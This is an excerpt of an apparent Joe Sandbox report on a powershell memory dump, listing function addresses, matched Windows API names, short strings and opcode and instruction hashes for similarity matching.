                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: YyE^$#v
                                                                                              • API String ID: 3664257935-498516039
                                                                                              • Opcode ID: 8c883613d913bc46024a17cddcac90e89585e4fc532252599ae8434469c1ff88
                                                                                              • Instruction ID: cd49855700923917f95fe7de4b8e1cd20ddddf6f103a0f78a36bbe5ec3045cfb
                                                                                              • Opcode Fuzzy Hash: 8c883613d913bc46024a17cddcac90e89585e4fc532252599ae8434469c1ff88
                                                                                              • Instruction Fuzzy Hash: 0531D53261C3819FD729CF34D9517EBBBE2EBD6304F59896ED4C9C7241DA3884068B16
                                                                                              Function 004246C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00424758
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: $%$MO
                                                                                              • API String ID: 237503144-1447536354
                                                                                              • Opcode ID: 90c457a34e9b28b8ba0762e0bf30d298973232d603382a756d5e139d3c7c2fd5
                                                                                              • Instruction ID: 30e7078ddafe6600f8588da727753701b477d514b6e9037cb53cb42e70cc2d0d
                                                                                              • Opcode Fuzzy Hash: 90c457a34e9b28b8ba0762e0bf30d298973232d603382a756d5e139d3c7c2fd5
                                                                                              • Instruction Fuzzy Hash: 2331AF707583455BD318CE69DCC535FBBD6EBC5224F05CA3CE8A5876C4D6B8880A8B82
                                                                                              Function 0042DEA6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: YyE^$#v
                                                                                              • API String ID: 3664257935-498516039
                                                                                              • Opcode ID: 675573e2fead0828b4c4670b7d3289e9ce55df97a72704bb45a70647df0cf8c3
                                                                                              • Instruction ID: 89cc180f0961dc7d79095d30b5c0c0fa534b3a062c8fb734847206e4fb73d93f
                                                                                              • Opcode Fuzzy Hash: 675573e2fead0828b4c4670b7d3289e9ce55df97a72704bb45a70647df0cf8c3
                                                                                              • Instruction Fuzzy Hash: E7318F7261C3419BD729CF34D95179BBBE2EBC6304F59892EE4D9C7240DA3884068B16
                                                                                              Function 0040B9B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: #v
                                                                                              • API String ID: 3664257935-554117064
                                                                                              • Opcode ID: 685643221d5374396bbf4562292a669eddd3f70e326c3c834e8608178020e3cd
                                                                                              • Instruction ID: c4fb0ad3dcba5787f72c473d19f6e8afd20e4234fcf911b6a84a43c8a2b63995
                                                                                              • Opcode Fuzzy Hash: 685643221d5374396bbf4562292a669eddd3f70e326c3c834e8608178020e3cd
                                                                                              • Instruction Fuzzy Hash: A5C002BA814404ABDE036BB1FC0981A3B69FB42349B240074A50281135EA3A0E22FF2D